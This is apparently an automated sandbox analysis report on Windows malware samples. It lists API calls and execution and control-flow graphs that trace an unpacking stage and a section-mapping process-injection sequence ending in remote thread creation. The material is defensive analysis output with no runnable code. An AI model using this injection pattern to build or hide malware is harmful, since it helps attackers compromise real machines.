                                                                  • Instruction Fuzzy Hash: D3B092B0DC46409BD7008BA0A814B513AA4E308742F404461F505C2180DA2014208F14
                                                                  APIs
                                                                  • BuildCommDCBA.KERNEL32(00000000,?), ref: 00415AA1
                                                                  • WritePrivateProfileStringA.KERNEL32(00418384,0041835C,00418330,0041830C), ref: 00415AC5
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415ACD
                                                                  • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415B0D
                                                                  • GetComputerNameW.KERNEL32(?,?), ref: 00415B21
                                                                  • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415B2F
                                                                  • OpenJobObjectA.KERNEL32(00000000,00000000,004183B4), ref: 00415B3E
                                                                  • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415B4F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073771249.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_40b000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                                                  • String ID: -
                                                                  • API String ID: 113859268-2547889144
                                                                  • Opcode ID: a2c051fec9ab3a8fcdae7612af1167ef9935c89225a402f84f65136c1e913747
                                                                  • Instruction ID: 60e73b42405168cd9d510addef8ef3a8b6b73bded157f1632dd387b8ccc8cba3
                                                                  • Opcode Fuzzy Hash: a2c051fec9ab3a8fcdae7612af1167ef9935c89225a402f84f65136c1e913747
                                                                  • Instruction Fuzzy Hash: 9A21FB31A84348EBD7209F94DC85FDA7B74FB4CB52F1041AAF649AA1C0CAB41AC48F59
                                                                  APIs
                                                                  • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415BC4
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415BDF
                                                                  • HeapDestroy.KERNEL32(00000000), ref: 00415BFE
                                                                  • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415C06
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2073771249.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_40b000_vsvrjra.jbxd
                                                                  Similarity
                                                                  • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                                                  • String ID:
                                                                  • API String ID: 367530164-0
                                                                  • Opcode ID: 28caf57345e6d0fcc585ba126ae085f4f289dabcd7c9f6727abea3362d7c0c3f
                                                                  • Instruction ID: bd69beaec25cac2caedfc94357a42cf62531597c09bd692e524a47bad036f564
                                                                  • Opcode Fuzzy Hash: 28caf57345e6d0fcc585ba126ae085f4f289dabcd7c9f6727abea3362d7c0c3f
                                                                  • Instruction Fuzzy Hash: CD012630A84704DBD740EBB4ED45BEA7BB8FB0C746F404077F60A97280DE3428548B9A

                                                                  Execution Graph

                                                                  Execution Coverage:11.8%
                                                                  Dynamic/Decrypted Code Coverage:18.9%
                                                                  Signature Coverage:9.7%
                                                                  Total number of Nodes:175
                                                                  Total number of Limit Nodes:10
                                                                  execution_graph 3554 4019c0 3555 4019c8 3554->3555 3556 4019e7 3554->3556 3557 401a29 Sleep 3556->3557 3558 4014fb 7 API calls 3557->3558 3559 401a44 3558->3559 3560 4015fb 7 API calls 3559->3560 3561 401a55 3559->3561 3560->3561 3498 402f42 3500 402f18 3498->3500 3499 40304f 3500->3499 3501 4019e0 15 API calls 3500->3501 3501->3499 3514 403103 3515 403246 3514->3515 3516 40312d 3514->3516 3516->3515 3517 4031f0 RtlCreateUserThread NtTerminateProcess 3516->3517 3517->3515 3350 2ba003c 3351 2ba0049 3350->3351 3363 2ba0e0f SetErrorMode SetErrorMode 3351->3363 3356 2ba0265 3357 2ba02ce VirtualProtect 3356->3357 3359 2ba030b 3357->3359 3358 2ba0439 VirtualFree 3362 2ba04be LoadLibraryA 3358->3362 3359->3358 3361 2ba08c7 3362->3361 3364 2ba0223 3363->3364 3365 2ba0d90 3364->3365 3366 2ba0dad 3365->3366 3367 2ba0dbb GetPEB 3366->3367 3368 2ba0238 VirtualAlloc 3366->3368 3367->3368 3368->3356 3432 401606 3432->3432 3433 401609 3432->3433 3434 4016af NtDuplicateObject 3433->3434 3442 4017cb 3433->3442 3435 4016cc NtCreateSection 3434->3435 3434->3442 3436 4016f2 NtMapViewOfSection 3435->3436 3437 40174c NtCreateSection 3435->3437 3436->3437 3438 401715 NtMapViewOfSection 3436->3438 3439 401778 3437->3439 3437->3442 3438->3437 3443 401733 3438->3443 3440 401782 NtMapViewOfSection 3439->3440 3439->3442 3441 4017a9 NtMapViewOfSection 3440->3441 3440->3442 3441->3442 3443->3437 3280 416090 3283 415c90 3280->3283 3282 416095 3284 415c9d 3283->3284 3285 415e80 3284->3285 3286 415d57 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3284->3286 3287 415e90 SetCommState 3285->3287 3291 415ea9 3285->3291 3288 415dbd 7 API calls 3286->3288 3287->3285 3289 415e71 3288->3289 3290 415e6a PulseEvent 3288->3290 3289->3285 3290->3289 3292 415f76 3291->3292 3293 415eb6 7 API calls 3291->3293 3304 4158e0 LocalAlloc 3292->3304 3300 415f4a 3293->3300 3297 415fcd 3306 415c00 3297->3306 3298 415f7b LoadLibraryA 3305 415910 GetModuleHandleW GetProcAddress VirtualProtect 3298->3305 3300->3292 3301 415fd2 3302 416009 InterlockedDecrement 3301->3302 3303 41601f 3301->3303 3302->3301 3303->3282 3304->3298 3305->3297 3307 415c29 QueryDosDeviceW 3306->3307 3308 415c3a 3306->3308 3307->3308 3317 415aa0 3308->3317 3311 415c55 3320 415ae0 3311->3320 3312 415c4d FreeEnvironmentStringsA 3312->3311 3315 415c7c 3315->3301 3316 415c6c HeapDestroy GetNumaHighestNodeNumber 3316->3315 3318 415ab1 FatalAppExitA GetModuleHandleW 3317->3318 3319 415ac3 3317->3319 3318->3319 3319->3311 3319->3312 3321 415aed 3320->3321 3322 415b19 3321->3322 3323 415b08 BuildCommDCBA 3321->3323 3324 415b43 3322->3324 3325 415b21 WritePrivateProfileStringA FreeEnvironmentStringsA 3322->3325 3323->3324 3327 415bca 3324->3327 3328 415b79 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3324->3328 3329 415ad0 3324->3329 3325->3324 3327->3315 3327->3316 3328->3324 3332 415a60 3329->3332 3333 415a89 3332->3333 3334 415a7c SetEvent 3332->3334 3333->3324 3334->3333 3562 2ba092b GetPEB 3563 2ba0972 3562->3563 3420 2c19ed2 3421 2c19ed8 3420->3421 3424 2c19f2d 3420->3424 3422 2c1a683 3 API calls 3421->3422 3423 2c19efb 3422->3423 3444 401613 3445 40161c 3444->3445 3446 4016af NtDuplicateObject 3445->3446 3455 4017cb 3445->3455 3447 4016cc NtCreateSection 3446->3447 3446->3455 3448 4016f2 NtMapViewOfSection 3447->3448 3449 40174c NtCreateSection 3447->3449 3448->3449 3450 401715 NtMapViewOfSection 3448->3450 3451 401778 3449->3451 3449->3455 3450->3449 3452 401733 3450->3452 3453 401782 NtMapViewOfSection 3451->3453 3451->3455 3452->3449 3454 4017a9 NtMapViewOfSection 3453->3454 3453->3455 3454->3455 3369 403257 3370 4031f0 RtlCreateUserThread NtTerminateProcess 3369->3370 3372 403261 3369->3372 3371 403246 3370->3371 3372->3372 3482 402ed9 3484 402e8d 3482->3484 3483 4019e0 15 API calls 3485 40304f 3483->3485 3484->3482 3484->3483 3484->3485 3335 2c19ee3 3336 2c19ef2 3335->3336 3339 2c1a683 3336->3339 3340 2c1a69e 3339->3340 3341 2c1a6a7 CreateToolhelp32Snapshot 3340->3341 3342 2c1a6c3 Module32First 3340->3342 3341->3340 3341->3342 3343 2c1a6d2 3342->3343 3344 2c19efb 3342->3344 3346 2c1a342 3343->3346 3347 2c1a36d 3346->3347 3348 2c1a3b6 3347->3348 3349 2c1a37e VirtualAlloc 3347->3349 3348->3348 3349->3348 3564 4019eb 3565 4019f0 3564->3565 3566 401a29 Sleep 3565->3566 3567 4014fb 7 API calls 3566->3567 3568 401a44 3567->3568 3569 4015fb 7 API calls 3568->3569 3570 401a55 3568->3570 3569->3570 3486 4014fa 3487 40150c 3486->3487 3488 4015ea 3487->3488 3489 4016af NtDuplicateObject 3487->3489 3489->3488 3490 4016cc NtCreateSection 3489->3490 3491 4016f2 NtMapViewOfSection 3490->3491 3492 40174c NtCreateSection 3490->3492 3491->3492 3493 401715 NtMapViewOfSection 3491->3493 3492->3488 3494 401778 3492->3494 3493->3492 3495 401733 3493->3495 3494->3488 3496 401782 NtMapViewOfSection 3494->3496 3495->3492 3496->3488 3497 4017a9 NtMapViewOfSection 3496->3497 3497->3488 3373 402fbe 3375 402fc3 3373->3375 3374 40304f 3375->3374 3377 4019e0 3375->3377 3378 4019e7 3377->3378 3379 401a29 Sleep 3378->3379 3384 4014fb 3379->3384 3381 401a44 3383 401a55 3381->3383 3396 4015fb 3381->3396 3383->3374 3394 40150c 3384->3394 3385 4016af NtDuplicateObject 3386 4016cc NtCreateSection 3385->3386 3395 4015ea 3385->3395 3387 4016f2 NtMapViewOfSection 3386->3387 3388 40174c NtCreateSection 3386->3388 3387->3388 3389 401715 NtMapViewOfSection 3387->3389 3390 401778 3388->3390 3388->3395 3389->3388 3391 401733 3389->3391 3392 401782 NtMapViewOfSection 3390->3392 3390->3395 3391->3388 3393 4017a9 NtMapViewOfSection 3392->3393 3392->3395 3393->3395 3394->3385 3394->3395 3395->3381 3397 40160b 3396->3397 3398 4016af NtDuplicateObject 3397->3398 3407 4017cb 3397->3407 3399 4016cc NtCreateSection 3398->3399 3398->3407 3400 4016f2 NtMapViewOfSection 3399->3400 3401 40174c NtCreateSection 3399->3401 3400->3401 3402 401715 NtMapViewOfSection 3400->3402 3403 401778 3401->3403 3401->3407 3402->3401 3404 401733 3402->3404 3405 401782 NtMapViewOfSection 3403->3405 3403->3407 3404->3401 3406 4017a9 NtMapViewOfSection 3405->3406 3405->3407 3406->3407 3407->3383

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 415c90-415cb8 2 415cc0-415cc7 0->2 3 415cc9-415ccb 2->3 4 415ccf-415cd5 2->4 3->4 5 415cd7-415ce1 4->5 6 415ce6-415cf0 4->6 5->6 7 415cf2-415cfe 6->7 8 415d08-415d0f 6->8 7->8 8->2 9 415d11-415d19 8->9 11 415d20-415d26 9->11 12 415d34-415d3b 11->12 13 415d28-415d2e 11->13 14 415d41-415d48 12->14 15 415d3d 12->15 13->12 14->11 16 415d4a-415d51 14->16 15->14 17 415e80-415e8e 16->17 18 415d57-415e68 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 415e90-415e9e SetCommState 17->19 21 415e71-415e7d 18->21 22 415e6a-415e6b PulseEvent 18->22 24 415ea0-415ea7 19->24 25 415ea9-415eb0 19->25 21->17 22->21 24->19 24->25 27 415f76-415f85 call 4158e0 25->27 28 415eb6-415f70 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->28 33 415f87-415f98 27->33 34 415fbd-415fc8 LoadLibraryA call 415910 27->34 28->27 37 415fa0-415fb0 33->37 38 415fcd-415fde call 415c00 34->38 39 415fb2 37->39 40 415fb8-415fbb 37->40 45 415fe0-415fe7 38->45 39->40 40->34 40->37 46 415ff3-415ff9 45->46 47 415fe9-415fef 45->47 49 416000-416007 46->49 50 415ffb call 415900 46->50 47->46 53 416016-41601d 49->53 54 416009-416010 InterlockedDecrement 49->54 50->49 53->45 55 41601f-41602f 53->55 54->53 57 416030-416040 55->57 58 416042 57->58 59 416049-41604c 57->59 58->59 59->57 60 41604e-416059 59->60 61 416060-416065 60->61 62 416067-41606d 61->62 63 41606f-416075 61->63 62->63 64 416077-416084 62->64 63->61 63->64
                                                                  APIs
                                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415D62
                                                                  • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415D7B
                                                                  • FindAtomW.KERNEL32(00000000), ref: 00415D82
                                                                  • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415D8A
                                                                  • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415DA2
                                                                  • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415DC9
                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00415DD1
                                                                  • GetVersionExW.KERNEL32(?), ref: 00415DDE
                                                                  • DisconnectNamedPipe.KERNEL32(?), ref: 00415DF1
                                                                  • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415E36
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415E45
                                                                  • LCMapStringA.KERNEL32(00000000,00000000,004183C0,00000000,?,00000000), ref: 00415E5B
                                                                  • PulseEvent.KERNEL32(00000000), ref: 00415E6B
                                                                  • SetCommState.KERNELBASE(00000000,00000000), ref: 00415E94
                                                                  • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415EC5
                                                                  • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415ED6
                                                                  • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415EDE
                                                                  • GetTimeFormatW.KERNEL32(00000000,00000000,?,004183EC,?,00000000), ref: 00415F1E
                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00415F25
                                                                  • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415F2B
                                                                  • GetBinaryType.KERNEL32(0041842C,?), ref: 00415F3D
                                                                  • LoadLibraryA.KERNELBASE(00418438), ref: 00415FC2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438988565.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_40b000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
                                                                  • String ID: k`$}$
                                                                  • API String ID: 2545807588-956986773
                                                                  • Opcode ID: ee9f9be1eea3864904fa2604a43f6a26db7559f4d69b73e0e97a970f018646e0
                                                                  • Instruction ID: 500cb7f68f8a5735401a0a6ba47bc000e865cb3074ff61a672bf7834970157e8
                                                                  • Opcode Fuzzy Hash: ee9f9be1eea3864904fa2604a43f6a26db7559f4d69b73e0e97a970f018646e0
                                                                  • Instruction Fuzzy Hash: 96A1E271845A24DBC720DB65EC58ADF7B78EF8D351F40406AF50AA7290DB381A81CBED

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 151 4014fb-401504 152 40151b 151->152 153 40150c-40152e 151->153 152->153 158 401531-401545 call 40127e 153->158 163 40154a-401555 158->163 163->163 164 401558-40155a 163->164 165 40155d-401572 164->165 168 401574-401579 165->168 170 4015c4 168->170 171 40157b 168->171 172 4015c6 170->172 173 40162f-401632 170->173 174 4015f6-4015f8 171->174 175 40157d-40159a 171->175 172->168 176 4015c8-4015cd 172->176 177 401634-401659 call 40127e 173->177 178 4016a5-4016a6 173->178 185 40159d 175->185 186 40152f-401530 175->186 181 401648-401659 176->181 182 4015cf-4015d0 176->182 190 40165b 177->190 191 40165e-401663 177->191 183 4016a7-4016a9 178->183 184 40162d 178->184 181->190 181->191 192 4015d2-4015e8 182->192 193 4015b6-4015b9 182->193 188 401987 183->188 189 4016af-4016c6 NtDuplicateObject 183->189 184->173 185->165 194 40159f-4015a1 185->194 186->158 200 401996-4019dd call 40127e 188->200 189->188 196 4016cc-4016f0 NtCreateSection 189->196 190->191 214 401989-401991 191->214 215 401669-40167a 191->215 198 4015ea-4015f5 192->198 199 40157c 192->199 193->177 195 4015bb-4015c3 193->195 201 4015a3 194->201 202 40161c 194->202 195->170 204 4016f2-401713 NtMapViewOfSection 196->204 205 40174c-401772 NtCreateSection 196->205 198->174 199->175 207 4015a9-4015b4 199->207 203 40161e-40162c 201->203 210 4015a5-4015a6 201->210 202->203 203->177 218 401643 203->218 204->205 212 401715-401731 NtMapViewOfSection 204->212 205->188 213 401778-40177c 205->213 207->193 210->207 212->205 217 401733-401749 212->217 213->188 220 401782-4017a3 NtMapViewOfSection 213->220 214->191 214->200 215->188 228 401680-4016a3 215->228 217->205 218->177 220->188 223 4017a9-4017c5 NtMapViewOfSection 220->223 223->188 227 4017cb call 4017d0 223->227 228->183
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                  • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                                  • Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                  • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 237 4015fb-401604 238 401615 237->238 239 40160b-401611 237->239 238->239 240 401618-40162c 238->240 239->240 244 401643 240->244 245 401634-401659 call 40127e 240->245 244->245 250 40165b 245->250 251 40165e-401663 245->251 250->251 253 401989-401991 251->253 254 401669-40167a 251->254 253->251 257 401996-4019dd call 40127e 253->257 258 401680-4016a9 254->258 259 401987 254->259 258->259 267 4016af-4016c6 NtDuplicateObject 258->267 259->257 267->259 268 4016cc-4016f0 NtCreateSection 267->268 271 4016f2-401713 NtMapViewOfSection 268->271 272 40174c-401772 NtCreateSection 268->272 271->272 274 401715-401731 NtMapViewOfSection 271->274 272->259 275 401778-40177c 272->275 274->272 277 401733-401749 274->277 275->259 278 401782-4017a3 NtMapViewOfSection 275->278 277->272 278->259 280 4017a9-4017c5 NtMapViewOfSection 278->280 280->259 283 4017cb call 4017d0 280->283
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                  • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                                  • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                  • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 285 401613-40162c 289 401643 285->289 290 401634-401659 call 40127e 285->290 289->290 295 40165b 290->295 296 40165e-401663 290->296 295->296 298 401989-401991 296->298 299 401669-40167a 296->299 298->296 302 401996-4019dd call 40127e 298->302 303 401680-4016a9 299->303 304 401987 299->304 303->304 312 4016af-4016c6 NtDuplicateObject 303->312 304->302 312->304 313 4016cc-4016f0 NtCreateSection 312->313 316 4016f2-401713 NtMapViewOfSection 313->316 317 40174c-401772 NtCreateSection 313->317 316->317 319 401715-401731 NtMapViewOfSection 316->319 317->304 320 401778-40177c 317->320 319->317 322 401733-401749 319->322 320->304 323 401782-4017a3 NtMapViewOfSection 320->323 322->317 323->304 325 4017a9-4017c5 NtMapViewOfSection 323->325 325->304 328 4017cb call 4017d0 325->328
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                  • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                                  • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                  • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 330 401606-401607 330->330 331 401609 330->331 332 40160b-40162c 331->332 333 40163c-401659 call 40127e 331->333 343 401643 332->343 344 401634-401639 332->344 341 40165b 333->341 342 40165e-401663 333->342 341->342 346 401989-401991 342->346 347 401669-40167a 342->347 343->344 344->333 346->342 350 401996-4019dd call 40127e 346->350 351 401680-4016a9 347->351 352 401987 347->352 351->352 360 4016af-4016c6 NtDuplicateObject 351->360 352->350 360->352 361 4016cc-4016f0 NtCreateSection 360->361 364 4016f2-401713 NtMapViewOfSection 361->364 365 40174c-401772 NtCreateSection 361->365 364->365 367 401715-401731 NtMapViewOfSection 364->367 365->352 368 401778-40177c 365->368 367->365 370 401733-401749 367->370 368->352 371 401782-4017a3 NtMapViewOfSection 368->371 370->365 371->352 373 4017a9-4017c5 NtMapViewOfSection 371->373 373->352 376 4017cb call 4017d0 373->376
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectView
                                                                  • String ID:
                                                                  • API String ID: 1652636561-0
                                                                  • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                  • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                                  • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                  • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 378 401627-40162c 382 401643 378->382 383 401634-401659 call 40127e 378->383 382->383 388 40165b 383->388 389 40165e-401663 383->389 388->389 391 401989-401991 389->391 392 401669-40167a 389->392 391->389 395 401996-4019dd call 40127e 391->395 396 401680-4016a9 392->396 397 401987 392->397 396->397 405 4016af-4016c6 NtDuplicateObject 396->405 397->395 405->397 406 4016cc-4016f0 NtCreateSection 405->406 409 4016f2-401713 NtMapViewOfSection 406->409 410 40174c-401772 NtCreateSection 406->410 409->410 412 401715-401731 NtMapViewOfSection 409->412 410->397 413 401778-40177c 410->413 412->410 415 401733-401749 412->415 413->397 416 401782-4017a3 NtMapViewOfSection 413->416 415->410 416->397 418 4017a9-4017c5 NtMapViewOfSection 416->418 418->397 421 4017cb call 4017d0 418->421
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2438965359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_A869.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                                  • Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
                                                                  • Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                                  • Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 423 401641-401659 call 40127e 430 40165b 423->430 431 40165e-401663 423->431 430->431 433 401989-401991 431->433 434 401669-40167a 431->434 433->431 437 401996-4019dd call 40127e 433->437 438 401680-4016a9 434->438 439 401987 434->439 438->439 447 4016af-4016c6 NtDuplicateObject 438->447 439->437 447->439 448 4016cc-4016f0 NtCreateSection 447->448 451 4016f2-401713 NtMapViewOfSection 448->451 452 40174c-401772 NtCreateSection 448->452 451->452 454 401715-401731 NtMapViewOfSection 451->454 452->439 455 401778-40177c 452->455 454->452 457 401733-401749 454->457 455->439 458 401782-4017a3 NtMapViewOfSection 455->458 457->452 458->439 460 4017a9-4017c5 NtMapViewOfSection 458->460 460->439 463 4017cb call 4017d0 460->463
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
